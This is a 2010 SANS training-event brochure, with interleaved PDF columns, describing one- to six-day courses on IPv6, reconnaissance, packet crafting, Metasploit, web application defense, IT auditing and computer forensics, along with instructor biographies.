One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Ullrich
Your network may not be ready for IPv6, but operating systems and network devices will not hold back. Already, modern
operating systems implement IPv6 by default. Windows 7, for example, ships with Teredo enabled by default. Your
existing firewall may not block it. Learning more about IPv6 is essential to securing your network. This course is designed
not just for implementers of IPv6, but also for those who just need to learn how to detect IPv6 and defend against threats
unintentional IPv6 use may bring.
SEC550: Information Reconnaissance:

Competitive Intelligence and Online Privacy
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Galbraith
Information is power! Never before in the history of mankind has so much information, been so readily available to so
many people. The trick is knowing where to look and how to look for it. An amazing amount of information is often
only a few skilled keystrokes away from anyone who wants it and knows how to access it. This course guides you on an
exciting and all too often disturbing journey through the World Wide Web (a.k.a Wild Wild Web) in search of actionable
information about people, process, and technology using open-source sources scattered throughout the far reaches of
cyberspace. You will learn about numerous sources, how to leverage Google Hacking effectively, and how to use the tools
of the trade as well as the mindset needed to maximize it all. Bottom line - if they know more than you do, they win...
SEC556: Comprehensive Packet Analysis

One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: SANS Staff
Please note that this class overlaps with SEC503: Intrusion Detection course substantially and should not be taken together.
Knowing how to decode network traffic is a skill requirement for any serious network or information security
administrator. Being able to decode the bits and bytes that represent mission-critical networks will give you the skills to
identify malicious activity, troubleshoot network failures, and analyze other desirable or undesirable network events.
This class will give you the skills necessary to decode network traffic with open-source tools available for Unix and
Windows systems. Students will learn advance pcap packet filtering methods to decode and manipulate network traffic
using tcpdump and use Wireshark to extract files (pictures, documents, executable, etc) from a data stream for malware
recovery, incident response and forensics analysis. You’ll be able to use these new skills to analyze current or future
network protocols and gain a better understanding of your network traffic. The tools covered in this class are: Windump/
TCPdump, Wireshark, Mergecap, Unix file command, and a Hex Editor.
SEC567: Power Packet Crafting with Scapy

One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Novak
Have you ever written a new Snort rule but had no test traffic to see if it alerts? Have you ever tried to craft traffic to
perform some pen testing using a restrictive command line packet crafting tool, but gave up because it couldn’t do what
you wanted it to do? Have you ever wondered if your firewall would block certain traffic? You feel a bit defeated because
you know what you want to do...you just don’t have the proper tool or wherewithal to do it.
The course author exhausted the limitations of command line tools when she was tasked with crafting overlapping TCP
segments – ones with the same TCP sequence numbers, but different payloads in the middle of an established session.
There is no command line tool that allows you to do this with complete control of packet header and payload values.
Attempting this using C or some other programming language seemed daunting. She learned that crafting packets using
scapy is not an arcane skill used only by advanced programmers; it is straightforward and fairly easy using the foundation
delivered in this one-day course.

SEC564: Hacker Detection for System Administrators
Two-Day Course • 9:00am - 5:00pm • Sun, Sept 26 - Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: Baccam
Key Techniques System Administrators Use to Find Hackers In Their Systems

(Also known as “Detecting the Wily Hacker”)
This course and continuing updates give system administrators up-to-date tools and techniques to illuminate evidence of
potentially malicious activity on their systems and to look deeper to determine whether problems are real. It uses hands-
on exercises to ensure sysadmins are comfortable using the tools. Because attack vectors are constantly changing, the
program does not stop with the first class, but continues with quarterly updates that illuminate the newest attacks and
how the lessons they learned before would be adjusted to target the newest attacks. Because attackers are increasingly
focusing on database and application software, the program will also include a growing library of up-to-date modules on
finding hackers in specific software applications and Web sites. The order of development of the additional modules will
be determined by a vote of the system administrators who are active in the program.
This course is not designed to make a sysadmin into a security geek. Rather, it will help sysadmins better understand how
they can do what is required by security teams and auditors without wasting a lot of time. The course also has a strong
focus on tools and techniques that system administrators need to meet audit and security requirements as efficiently as
possible. In other words, this class provides the tools and techniques that help sysadmin teams meet the needs of security
and audit teams – and still do their day jobs.
SEC577: Virtualization Security Fundamentals

Two-Day Course • 9:00am - 5:00pm • Sun, Sept 26 - Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: Shackleford
One of today’s most rapidly evolving and widely deployed technologies is server virtualization. It cannot be stressed
Many organizations are already realizing the cost savings from implementing virtualized servers, enough that if your laptop
and systems administrators love the ease of deployment and management for virtualized sys- does not meet minimum
tems. There are even security benefits to virtualization – easier business continuity and disaster configuration requirements,
recovery, single points of control over multiple systems, role-based access, and additional audit- you will not be able to
participate in this course.
ing and logging capabilities for large infrastructures.
With these benefits comes a dark side, however. Virtualization technology is the focus of many new potential threats and
exploits and presents new vulnerabilities that must be managed. In addition, there are a vast number of configuration
options that security and system administrators need to understand, with an added layer of complexity that has to be
managed by operations teams. Virtualization technologies also connect to network infrastructure and storage networks
and require careful planning with regard to access controls, user permissions, and traditional security controls.
Prerequisites: Basic knowledge of systems and networking, some exposure to VMware ESX is helpful but not essential.
NEW Two-DaySEC580: Metasploit Kung Fu for Enterprise Pen Testing

Course • 9:00am - 5:00pm • Sun, Sept 26 - Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: John Strand
Many enterprises today face regulatory or compliance requirements that mandate regular penetration testing and vulner-
ability assessments. Commercial tools and services for performing such tests can be expensive. While really solid free
tools such as Metasploit, are available, many testers do not understand the comprehensive feature sets of such tools and
how to apply them in a professional-grade testing methodology. Metasploit was designed to help testers with confirming
vulnerabilities using an Open Source and easy to use framework. This Official Metasploit Course will help students get the
most out of this free tool. Learn how to apply the incredible capabilities of the Metasploit Framework in a comprehensive
penetration testing and vulnerability assessment regimen, according to a thorough methodology for performing effective
tests. Upon completion, you will have a firm understanding of how Metasploit can fit into your penetration testing and
day-to-day assessment activities.
September 19 - 29, 2010 19
SECURITY
566
Who Should Attend Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
• Information assurance auditors 30 CPE Credits • Laptop Required • Instructor: Bryce Galbraith
• System implementers/
administrators This course helps you master specific, proven
• Network security engineers techniques and tools needed to implement and
• IT administrators audit the Top Twenty Most Critical Security Controls.
• DoD personnel/contractors These Top 20 Security Controls, listed below, are rapidly becoming accepted as the
• Federal agencies/clients highest priority list of what must be done and proven before anything else at nearly
all serious and sensitive organizations. These controls were selected and defined by
• Private sector organizations
looking for information the US military and other government and private organizations (including NSA, DHS,
assurance priorities for securing GAO, and many others) who are the most respected experts on how attacks actu-
their systems ally work and what can be done to stop them. They defined these controls as their
consensus for the best way to block the known attacks and the best way to help find
• Security vendors and consulting
and mitigate damage from the attacks that get through. For security professionals, the
groups looking to stay current
with frameworks for information course enables you to see how to put the controls in place in your existing network
assurance through effective and widespread use of cost-effective automation. For auditors,
CIOs, and risk officers, the course is the best way to understand how you will measure
• Alumni of SEC/AUD440, SEC401,
whether the Top 20 controls are effectively implemented. It closely reflects the Top 20
SEC501, SANS Audit classes, and
MGT512 Critical Security Controls found at http://www.sans.org/critical-security-controls.
One of the best features of the course is that it uses offense to inform defense. In
other words, you will learn about the actual attacks that you’ll be stopping or miti-
gating. That makes the defenses very real, and it makes you a better security person.
Top 20 Critical Security Controls
Critical Controls Subject to Automated Collection, 11 Account Monitoring and Control
Measurement, and Validation: 12 Malware Defenses
1 Inventory of Authorized and Unauthorized Devices 13 Limitation and Control of Network Ports, Protocols,
2 Inventory of Authorized and Unauthorized Software and Services
3 Secure Configurations for Hardware and Software on 14 Wireless Device Control
Laptops, Workstations, and Servers 15 Data Loss Prevention
4 Secure Configurations of Network Devices Such as
Firewalls, Routers, and Switches Additional Critical Controls (not directly supported by
5 Boundary Defense automated measurement and validation):
6 Maintenance and Analysis of Security Audit Logs 16 Secure Network Engineering
7 Application Software Security 17 Penetration Tests and Red Team Exercises
8 Controlled Use of Administrative Privileges 18 Incident Response Capability
9 Controlled Access Based On Need to Know 19 Data Recovery Capability
Certified Instructor 10 Continuous Vulnerability Assessment and Remediation 20 Security Skills Assessment and Training to Fill Gaps
Bryce Galbraith
Bryce began his IT journey at 10 years of age with a Commodore 64 and a 300 baud modem. As a contributing author of the
internationally bestselling book Hacking Exposed: Network Security Secrets & Solutions, Bryce helped bring the secret world of
hacking out of the darkness and into the public eye. Bryce has held security positions at global ISPs and Fortune 500 compa-
nies as well as being a senior member of Foundstone’s world renowned attack and penetration team. Bryce also served as
senior instructor and co-author of Foundstone’s Ultimate Hacking: Hands-On series. He has taught the art of ethical hacking
and countermeasures to thousands of IT professionals from a “who’s who” of top companies, financial institutions, and govern-
ment agencies around the globe. Bryce teaches SEC504, SEC560, and SEC401 for SANS. Bryce is an active member of several
security-related professional organizations, speaks at a variety of conferences, and holds a number of certifications: CISSP,
GCIH, GSEC, CEH, CHFI, Security+, and CCNA. Bryce is currently lead consultant and co-founder of Layered Security. Bryce also
blogs about security issues at http://blog.layeredsec.com.

SECURIT Y
301
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm Who Should Attend
30 CPE Credits • Instructor: Fred Kerby • Persons new to information
technology (IT) who need
This introductory to understand the basics of
information assurance, computer
certification course is the networking, cryptography, and
fastest way to get up to speed risk evaluation
in information security. • Managers and information
security officers who need a
Written and taught by battle-scarred security
basic understanding of risk
veterans, this entry-level course covers a broad management and the tradeoffs
spectrum of security topics and is liberally between confidentiality, integrity,
sprinkled with real life examples. A balanced and availability
mix of technical and managerial issues makes • Managers, administrators, and
this course appealing to attendees who need auditors who need to draft,
to understand the salient facets of information update, implement, or enforce
security and risk management. Organizations policy
often tap someone who has no information
Senior Instructor
security training and say, “Congratulations, you are
Fred Kerby now a security officer.” If you need to get up to
Fred is an engineer,
speed fast, Security 301 rocks!
manager, and security
practitioner whose experi- We begin by covering basic terminology
ence spans several genera- and concepts, and then move to the basics
tions of networking. He is of computers and networking as we discuss
the information assurance Internet Protocol, routing, Domain Name Service,
manager at the Naval and network devices. We cover the basics of
Surface Warfare Center, cryptography, and wireless networking, then
Dahlgren Division and has we look at policy as a tool to effect change in your
vast experience with the organization. In the final day of the course, we put it all
political side of security inci- together with an introduction to defense in-depth.
dent handling. His team is If you’re a newcomer to the field of information security, this
one of the recipients of the is the course for you! You will develop the skills to bridge “This fundamental
SANS Security Technology the gap that often exists between managers and system course sets the
Leadership Award as well administrators and learn to communicate effectively with groundwork for
as the Government Tech- personnel in all departments and at all levels within your a successful future
nology Leadership Award. organization. in IT security.”
Fred received the Navy This is the course SANS offers for the professional just starting -BRIAN FRICKE,
Meritorious Civilian Service out in security. If you have experience in the field, please US NAVY/MSC
Award in recognition of his consider our more advanced offerings, such as SEC401: SANS
technical and management Security Essentials Bootcamp Style.
leadership in computer
and network security. A
frequent speaker at SANS, Register at
Fred’s presentations reflect www.sans.org/
his opinions and are not the network-security-2010
opinions of the Department
17
21
GIAC Certification DoD 8570 Required SANS Network Security 2010
of the Navy. www.giac.org www.sans.org/8570 September 19 - 29, 2010
D E V E LO P E R
522
Who Should Attend Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
• Application developers 36 CPE Credits • Laptop Required • Instructor: Johannes Ullrich, PhD
• Application security
analysts or managers Defending Web applications is critical!
• Application architects
In battle an attacker is exposed and at massive
• Penetration testers who are interested disadvantage when fighting against a well entrenched
in learning about defense strategies
defender. This course will teach you how to build defense-in-
• Security professionals who are depth, allowing you to detect and expose an attacker early. Learn
interested in learning about
about the ‘tripwires and obstacles’ that savvy defenders use to
application security
detect, channel, and thwart attacks! The course material distills
• Auditors who need to understand
the experience of two top defenders of embattled Web sites, and
defensive mechanisms in applications
builds on the industry consensus research of the CWE/SANS Top
25 programming errors (CWE 25) and the OWASP Top 10.
Mitigation strategies from an infrastructure, architecture,
and coding perspective will be discussed alongside real-
world implementations that really work. The testing aspect
of vulnerabilities will also be covered so you can ensure your
application is tested for the vulnerabilities discussed in class.
The class goes beyond classic Web applications and includes
coverage of Web 2.0 technologies like AJAX and Web services.
To maximize the benefit for a wider range of audiences, the
discussions in this course will be programming language agnostic.
Focus will be maintained on security strategies rather than coding level
implementation.
AUTHOR STATEMENT
Too many Websites are getting compromised these days. The course will cover the topics outlined by OWASP’s Top 10 risks
Our goal for this course is to arm the students with de- document, as well as additional issues the authors found of importance
fensive strategies that can work for all Web applications. in their day-to-day Web application development practice. An example
We all know it is very difficult to defend a Web applica- of the topics that will be covered include:
tion; there are so many different types of vulnerabilities
and attack channels. Overlook one thing and your Web • Infrastructure security • Cross site request forging
app is owned. The defensive perimeter needs to extend • Server configuration • Authentication bypass
far beyond just the coding aspects of Web application.
• Authentication mechanisms • Web services and related flaws
In this course, we cover the security vulnerabilities so
students have a good understanding of the problems • Application language configuration • Web 2.0 and it’s use of Web services
at hand. We then provide the defensive strategies and • Application coding errors like SQL injection • XPATH and XQUERY languages and injection
tricks as well as overall architecture that are proven to and cross site scripting • Business logic flaws
help secure sites. I have also included some case studies
throughout the course so we can learn from the mistakes
of others and make our own defense stronger. The The course will make heavy use of hands-on exercises. It will conclude
exercises in class were designed to help you further the with a large defensive exercise, reinforcing the lessons learned
understanding and help retain the knowledge by hands- throughout the week.
on practice. By the end of the course, you will have
the practical skills and understanding of the defensive
strategies to lock down existing applications,as well as This course covers the OWASP Top 10 and
building more secure applications in the future. -Jason
Lam and Johannes Ullrich, PhD the CWE/SANS Top 25 Programming Errors
which are important in Java development.
September 19 - 29, 2010
522.1 Hands On: Web Basics and Authentication Security*
We begin with an overview of the software development life cycle and security. Proper security control and
process during development is essential to having secure applications, as well as the essential technologies
that are at play in Web applications. You can’t win the battle if you don’t understand what you are trying to
defend. Learn how Web applications work and the security concepts related to them. We discuss the authen-
tication aspect of Web applications in depth, including the vulnerabilities, followed by examples of exploita-
tion and the mitigations that could be implemented in the short and long term. Learn the right way of plan-
ning for access during the development life cycle and the common pitfalls with access control by starting
with the vulnerabilities, mitigation and testing, followed by a section on the best practice on authorization.
Topics: HTTP Basics; Overview of Web Technologies; Web Application Architecture; Recent Attack Trends;
Authentication Vulnerabilities and Defense; Authorization Vulnerabilities and Defense
522.2 Hands On: Web Application Common Vulnerabilities

and Mitigations*
Since the Internet does not guarantee secrecy of information being transferred, encryption is commonly
used to protect the integrity and secrecy of information on the Web. We cover the security of data in transit
or on disk and how encryption can help with securing that information in the context of Web application
security. We discuss session management in Web applications and a hacker’s technique in attacking the
session mechanism and related defense strategies. The best practices of session security and cross-site
request forgery are discussed to ensure your application’s session management is as strong as possible.
Then we cover business logic flaws and concurrency; the difficult topics to detect by automated scanners.
The day ends with input-related flaws and SQL injection, the basic mechanics of these vulnerabilities,
Certified Instructor
followed by the real-world attack trends. We delve into the mitigation and the best practice in avoiding
Johannes Ullrich, PhD these critical vulnerabilities.
Topics: SSL vulnerabilities and Testing; Proper Encryption Use in Web Application; Session Vulnerabilities and
As chief research officer for Testing; Cross-site Request Forgery; Business Logic Flaws; Concurrency; Input Related Flaws and Related
Defense; SQL Injection Vulnerabilities, Testing, and Defense
the SANS Institute, Johannes
is currently responsible for 522.3 Hands On: Proactive Defense and Operation Security*
Day three begins with a detailed discussion on cross-site scripting, related mitigation, and testing strategy,
the SANS Internet Storm as well as HTTP response splitting. Defending the platform and host by locking down the Web environment
Center (ISC) and the GIAC Gold is an essential topic. We will discuss the correct approach to handling incidents and handling logs and the
intrusion detection aspect of Web application security. Then we will turn our focus to the proactive defense
program. He founded DShield. mechanism so that we stay ahead of the bad. Topics such as file upload handling, intrusion detection,
honeypot, redirection, in-depth authentication information, and practical input validation strategy will be
org in 2000, which is now the covered. This information will give you the extra edge in defending your application.
data collection engine behind Topics: Web Environment Configuration Security; Intrusion Detection in Web Application; Incident Handling;
Honeytoken
the ISC. His work with the ISC
has been widely recognized,
522.4 Hands On: AJAX and Web Services Security*
Day four is dedicated to AJAX and Web services security. Asynchronous JavaScript and XML (AJAX) and
and in 2004, Network World Web services are currently the most active areas in Web application development. Security issues continue
to arise as organizations are diving head first into insecurely implementing new Web technologies without
named him one of the 50 first understanding them. We cover the security issues, mitigation strategies, and general best practices for
implementing AJAX and Web Services. We also examine real-world attacks and trends to give you a better
most powerful people in the understanding of exactly what you’re protecting against. Discussion focuses on the Web services in the
networking industry. Prior to morning and AJAX technologies in the afternoon.
Topics: Web Services Overview; Security in Parsing of XML; XML Security; AJAX Technologies Overview; AJAX Attack
working for SANS, Johannes Trends and Common Attacks; AJAX Defense
worked as a lead support engi- 522.5 Hands On: Cutting-Edge Web Security*
neer for a Web development Day five has a strong focus on cutting-edge Web application technologies and current research area.
Clickjacking and DNS rebinding are difficult to defend against and require multiple defense strategies to
company and as a research be successful. We cover the new generation of single sign on solutions such as OpenID and the implication
physicist. Johannes holds a of using these authentication systems and the common gotchas to avoid. The Web2.0 adoption, the use
of Java applet, Flash, ActiveX, and Silverlight are on the increase. The security strategies of defending these
PhD in Physics from SUNY technologies are discussed so these client-side technologies can be locked down properly.
Topics: Clickjacking; DNS Rebinding; Flash Security; Java Applet Security; Single Sign On Solution and Security; IPv6
Albany and is located in Jack- Impact on Web Security
sonville, Florida. He also enjoys 522.6 Hands On: Capture & Defend the Flag Exercise*
blogging about application Day six starts with an introduction to the secure software development life cycle and how to apply it to
Web development. The major focus is a large lab which ties the lessons learned during the week together
security tips. https://blogs.sans. and reinforces the lessons by practicing them hands on. You are provided with a virtual machine
org/appsecstreetfighter. implementing a complete database driven dynamic Web site. A custom tool is used to enumerate
security vulnerabilities and simulate a vulnerability assessment of the Web site. It will be up to
you to decide which vulnerabilities are real and which are false positives. You are then asked to
mitigate the vulnerabilities. The scanner will score students as vulnerabilities are eliminated
“Excellent immediately or checked off as false positives. Advanced students will be able to extend this exercise
and find vulnerabilities not presented by the scanner. You will learn hands on how
usable information and to secure the Web application, starting with the operating system, the Web server,
finding configuration problems in the application language setup, and finding
Register at
lots of it. This will really and fixing coding problems in the site. www.sans.org/
help in my company’s PCI Topics: Mitigation of Server Configuration Errors; Discovering and Mitigating network-security-2010
Coding Problems; Testing Business Logic Issues and Fixing Problems;
compliance efforts.” Web Services Testing and Security Problem Mitigation
-SIMON MINER, CHRISTIANBOOK.COM *This course is available to Developer 522 participants only.
September 19 - 29, 2010 23
AUDIT
507
• Auditors seeking to identify key 36 CPE Credits • Laptop Required • Instructor: David Hoelzer
controls in IT systems
• Audit professionals looking for
technical details on IT auditing One of the most significant obstacles
• Managers responsible for overseeing the facing many auditors today is how exactly
work of an IT audit or security team to go about auditing the security of an enterprise.
• Security professionals newly tasked with
audit responsibilities What systems really matter? How do we prioritize the audits that
• System and network administrators need to be performed and determine the scope of each? How do
looking to better understand what an you validate the security of the perimeter? What settings should
auditor is trying to achieve, how they think, be checked on the various systems under scrutiny? Which set of
and how to better prepare for an audit
processes can be put into place to allow an auditor to focus on the
• System and network administrators
seeking to create strong change control business processes rather than the security settings?
management and detection systems for This course is organized specifically to provide a risk-driven method
the enterprise
for tackling the enormous task of designing an enterprise security
validation program. After covering high-level audit issues and general
audit best practice, students will have the opportunity to dive into the
technical how-to for determining the key controls that can be used to
provide a level of assurance to an organization. Tips on how to repeat-
edly verify these controls and techniques for automatic compliance
validation will come from real-world examples.
One of the struggles that IT auditors face is helping management
understand the relationship between the technical controls and the
risks to the business. The instructor will use validated information from
real-world situations to explain how they can be used to raise the aware-
AUTHOR STATEMENT ness of management and others within the organization to understand
This advanced systems audit course stands alone in why these controls specifically, and auditing in general, is important.
the information assurance arena as the only com-
Each student is invited to bring a Windows XP Professional or higher
prehensive source for hands-on audit how-to. Past
students have included long-time auditors and those laptop for use during class. Macintosh computers running OS X may
new to the field, both of whom have found significant also be used with VMware Fusion.
benefit from the refresher material. A vice president
with the Institute of Internal Auditors said, “I’ve been A great audit is more than marks on a checklist; it is the understanding
auditing systems for a very long time, and no one ever of the underlying controls, knowing what the best practices are, and
actually gave me a formal process that I can apply to having enough information to understand why. Sign up for this course
conducting technical audits. Thank you!” While we and experience the mix of theory, hands-on, and practical knowledge.
don’t require a high level of technical experience as
a prerequisite to this course, we have worked hard to
make sure that anyone who comes to the course walks
away with a wealth of material that they can go back
to their office and apply tomorrow. We realistically
address the problem -- how do I get there from here?
-- by offering short-term goal solutions, which, when
combined, will allow you to achieve your goal: identify,
report on, and reduce risk in your enterprise.
-David Hoelzer
24 SANS Network Security 2010 GIAC Certification DoD 8570 Required STI Masters Program
September 19 - 29, 2010 www.giac.org www.sans.org/8570 www.sans.edu
Auditing Networks, Perimeters, and Systems is a hands-on course and is the most compre-
hensive, most technically advanced audit course on planet earth! Entry level IT auditors tend to earn
$40,000 - $65,000 while more advanced auditors can earn up to $95,000. Those with the coveted GSNA
certification often earn 8% more than those without.
507.1 Audit Principles, Risk Assessment,

and Effective Reporting
In addition to filling in any foundational gaps that you might have in auditing principles,
this day’s material will give you two extremely useful risk assessment methods that are ef-
fective in measuring the security of a system and identifying weak or non-existent controls.
Following this discussion, you will be able to analyze an existing set of controls, a business
process, an audit exception, or a security incident, identify any missing or ineffective con-
trols, and identify what corrective actions will eliminate the problem in the future.
Topics: Auditor’s Role in Relation to Policy Creation, Policy Conformance, and Incident Handling; Benefits of Various
Auditing Standards and Certifications; Basic Auditing and Assessing Strategies, Risk Assessment; The Six-step
Audit Process
507.2 Hands On: Auditing the Perimeter

Focus on some of the most sensitive and important parts of our information technology
SANS Faculty Fellow infrastructure: routers and firewalls. In order to properly audit a firewall or router, we need to
David Hoelzer clearly understand the total information flow that is expected for the device. Diagrams will
With more than twenty years of allow the auditor to identify what objectives the routers and firewalls are seeking to meet,
thus allowing controls to be implemented which can be audited. Overall, this course will
experience, David has served in
teach the student everything needed to audit routers, switches, and firewalls in the real world.
positions ranging from the highly Topics: Overview; Detailed Audit of a Router; Auditing Switches; Testing the Firewall; Testing the Firewall Rulebase;
technical to senior management Testing Third-Party Software; Reviewing Logs and Alerts; The Tools Used
for a variety of organizations. For 507.3 Hands On: Network Auditing Essentials
the last ten years, David has been This day continues where day two left off, extending network and perimeter auditing to internal
the director of research for Cyber- system validation and vulnerability testing, helping network security professionals to see how
Defense and the principal examiner to use the tools and techniques described to audit, assess, and secure a network in record time.
Following a defense-in-depth approach, learn how to audit perimeter devices, create maps of
for Enclave Forensics. In addition active hosts and services, and assess the vulnerability of those services. Hands-on exercises are
to day-to-day responsibilities, he conducted throughout the day so students have the opportunity to use the tools.
has acted as an expert witness Topics: Introduction; War Dialing; Wireless; Mapping Your Network; Configuration Auditing of Key Services;
Analyzing the Results; Follow-on Activities
for the Federal Trade Commission
and continues to teach at major 507.4 Hands On: Web Application Auditing
SANS events, teaching security We’ll start with the underlying principles of Web technology and introduce a set of tools
that can be used to validate the security of these applications. Then we will build and work
professionals from organizations
through a checklist for validating the existence and proper implementation of controls to
including NSA, USDA Forest Service, mitigate the primary threats found in Web applications.
Fortune 500 security engineers and Topics: Identify Controls Against Information Gathering Attacks; Process Controls to Prevent Hidden Information
Disclosures; Control Validation of the User Sign-on Process; Examining Controls Against User Name
managers, DHHS, various DoD sites, Harvesting; Validating Protections Against Password Harvesting; Best Practices for OS and Web Server
national laboratories, and many Configuration; How to Verify Session Tracking and Management Controls; Identification of Controls to Handle
Unexpected User Input; Server-side Techniques for Protecting Your Customers and Their Sensitive Data
colleges and universities. From
time to time David also speaks 507.5 Hands On: Advanced Windows Auditing
nationally and internationally on Systems based on the Windows NT line (XP, 2003, Vista, 2008 and Windows 7) make up a
large part of the typical IT infrastructure. Quite often, these systems are also the most dif-
various security topics. David also ficult to effectively secure and control. This class gives you the keys, techniques, and tools
blogs about IT Audit issues at the to build an effective long term audit program for your Microsoft Windows environment.
SANS It Audit blog. Topics: Progressive Construction of a Comprehensive Audit Program; Automating the Audit Process;
Windows Security Tips and Tricks; Maintaining a Secure Enterprise
https://blogs.sans.org/it-audit
507.6 Hands On: Auditing Unix Systems
Students will gain a deeper understanding of the inner workings and
“I can immediately implement fundamentals of the Unix operating system as applied to the major
Register at
and manage the included Unix environments in use in business today. Students will get to
explore, assess, and audit Unix systems hands-on. Neither Unix www.sans.org/
tools to see an instant return nor scripting experience is required for this day. network-security-2010
on investment.” Topics: Auditing to Create a Secure Configuration; Auditing to Maintain a
-DAVID LIPSHAW THE WILLS GROUP, INC.
Secure Configuration; Auditing to Determine What Went Wrong SANS Network Security 2010
September 19 - 29, 2010 25
FORENSICS
408
• Information technology professionals 36 CPE credits • Laptop Required • Instructor: Rob Lee
who wish to learn core concepts in
computer forensics investigations and
e-discovery Master computer forensics.
• Law enforcement officers, federal agents, Learn essential investigation techniques.
or detectives who desire to be introduced With today’s ever-changing technologies and environments, it
to core forensic techniques and topics
is inevitable that organizations will deal with some form of cyber
• Information security managers who crime, such as computer fraud, insider threat, industrial espionage, or
need a digital forensics background in
order to manage investigative teams and phishing. As a result, many organizations are hiring digital forensic
understand the implications of potential professionals and are callling cybercrime law enforcement agents to
ligation-related issues help fight and solve these types of crime.
• Information technology lawyers and FOR408: Computer Forensic Essentials focuses on the essentials that
paralegals who need to understand the
basics of digital forensic investigations a forensic investigator must know to investigate core computer crime
incidents successfully. You will learn how computer forensic analysts
• Anyone interested in computer forensic
investigations with some background in focus on collecting and analyzing data from computer systems to
information systems, information security, track user-based activity that could be used internally or in civil/
and computers criminal litigation.
This course covers the fundamental steps of the in-depth computer
forensic methodology so that each student will have the complete
qualifications to work as a computer forensic investigator in the field
helping solve and fight crime. This is the first course in the SANS
Computer Forensic Curriculum. If this is your first computer forensics
course with SANS, we recommend that you take this introductory course
first to set a strong foundation for the full SANS Computer Forensic
Curriculum.
AUTHOR STATEMENT
SANS COMPUTER FORENSICS GRADUATE THWARTS BANK FIGHT CRIME. UNRAVEL INCIDENTS... ONE BYTE AT A TIME.
HEIST. Headlines similar to these are now a reality as
former students have e-mailed me regularly about
how they were able to use their digital forensic skills in With this course, you will receive a FREE SANS Investigative Forensic
very real situations. Graduates of Computer Forensics Toolkit (SIFT) Essentials with a Tableau Write Block Acquisition Kit.
Essentials are the front line troops deployed when The entire kit will enable each investigator to accomplish proper and
incidents occur. From stopping online bank heists to
secure examinations of SATA, IDE, or Solid State Drives (SSD). The toolkit
logic bombers trying to destroy data that could affect
many lives, SANS digital forensic graduates are bat- consists of:
tling and winning the war on crime. Graduates have • Free SANS Investigative Forensic Toolkit (SIFT)
described solved cases involving computer break-ins, - One Tableau T35es eSATA Forensic Bridge
intellectual property theft, fraud, and, in some cases,
- IDE Cable/Adapters
internal infractions by belligerent employees. Knowing
that this course places the correct methodology and - SATA Cable/Adapters
knowledge in the hands of responders who thwart the - FireWire and USB Cable Adapters
plans of criminals or foreign cyber attacks brings me - Forensic Notebook Adapters (IDE/SATA)
great comfort. Graduates are doing it. Daily. I am proud - HELIX Incident Response and Computer Forensics Live CD
that the Computer Forensics Essentials course at SANS
helped prepare them to fight and solve crime. - Rob Lee
• SANS Windows XP Forensic Analysis VMware Workstation
• Course DVD: Loaded with case examples, tools, and documentation
September 19 - 29, 2010
SANS Computer Forensic Web site http//computer-forensics.sans.org
The learning does not end when class is over. SANS Computer Forensic Web site is a community-focused
site offering digital forensics professionals a one-stop forensic resource to learn, discuss, and share current
developments in the field. It also provides information regarding SANS forensics training, GIAC certification,
and upcoming events. Visit http://computer-forensics.sans.org. New content is added regularly, so please
visit often. In addition, do not forget to share this information with your fellow forensic professionals.
408.1 Hands On: Forensic and E-Discovery Fundamentals*

Investigations begin with a firm knowledge in proper evidence acquisition and analysis.
Digital Forensics is more than just using a tool that automatically recovers data. You
must focus on the facts to seek the truth. Digital Forensics requires analytical skills.
Today you will learn how the professionals accomplish digital forensics.
Topics: Purpose of Forensics; Discussion Major Case Types; Types of Electronic Stored Information; Location of
SANS Faculty Fellow Electronically Stored Evidence (ESI); Evidence Collection Order of Volatility; Hard Drive Basics; File System
Basics; Evidence Fundamentals; Reporting and Presenting Evidence; Forensic Methodology
Rob Lee
Rob Lee is a director for MANDIANT 408.2 Hands On: Evidence Acquisition and Analysis*
(www.mandiant.com). Rob is the
You will learn proper evidence acquisition, integrity, and handling skills of logical,
curriculum lead for digital forensic physical, and system memory utilizing the Tableau T35es write blocker. Moving quickly
training at the SANS Institute (forensics. from evidence acquisition, you will begin your investigation using cutting-edge tools
sans.org). He has over 14 years of expe- that the pros use.
rience in computer forensics, vulner- Topics: Evidence Acquisition Basics; Preservation of Evidence; Types of Acquisition; Forensic Field Kits; Full Disk
Image Acquisition Tools and Techniques; Network Acquisition; Graphical Forensic Tools; Traditional Tasks
ability and exploit discovery, intrusion Utilized Using the Forensic Tools; Recover Deleted Files
detection/prevention, and incident
response. Rob graduated from the U.S. 408.3 Hands On: E-Mail and Registry Analysis*
Air Force Academy and served in the Beginning with host, server, and webmail forensics the investigator will learn how
Air Force as a founding member of the to recover and analyze the most popular form of communication. The second focus
609th Information Warfare Squadron, centers on Windows XP, Vista, and Windows 7 Registry Analysis and USB Device
the first U.S. military unit focused on Forensics.
information operations. Later, as a Topics: E-mail Forensics; Registry Forensics In-Depth
member of the Air Force Office of
Special Investigations, he conducted
408.4 Hands On: Artifact and Log File Analysis*
Hundreds of files are created by actions of the suspect. Learn how to examine key files
computer crime investigations, incident
such as link files, the windows prefetch, pagefile/system memory, and more. The latter
response, and computer forensics. Prior part of the day will center on examining the Windows log files and the usefulness in
to joining MANDIANT, he worked with a both simple and complex cases.
variety of government agencies in the Topics: Memory, Pagefile, and Unallocated Space Analysis; Forensicating Files Containing Critical Digital Forensic
Evidence; Windows Event Log Digital Forensic Analysis
law enforcement, U.S. Department of
Defense, and intelligence communities
408.5 Hands On: Web Browser Forensics*
as the technical lead for a vulnerability
Internet Explorer and Firefox Browser Digital Forensics. Learn how to examine exactly
discovery and exploit development
what an individual did while surfing via their Web browser. The results will give you
team, lead for a cyber forensics branch, pause the next time you use the Web.
and lead for a computer forensic and Topics: Browser Forensics
security software development team.
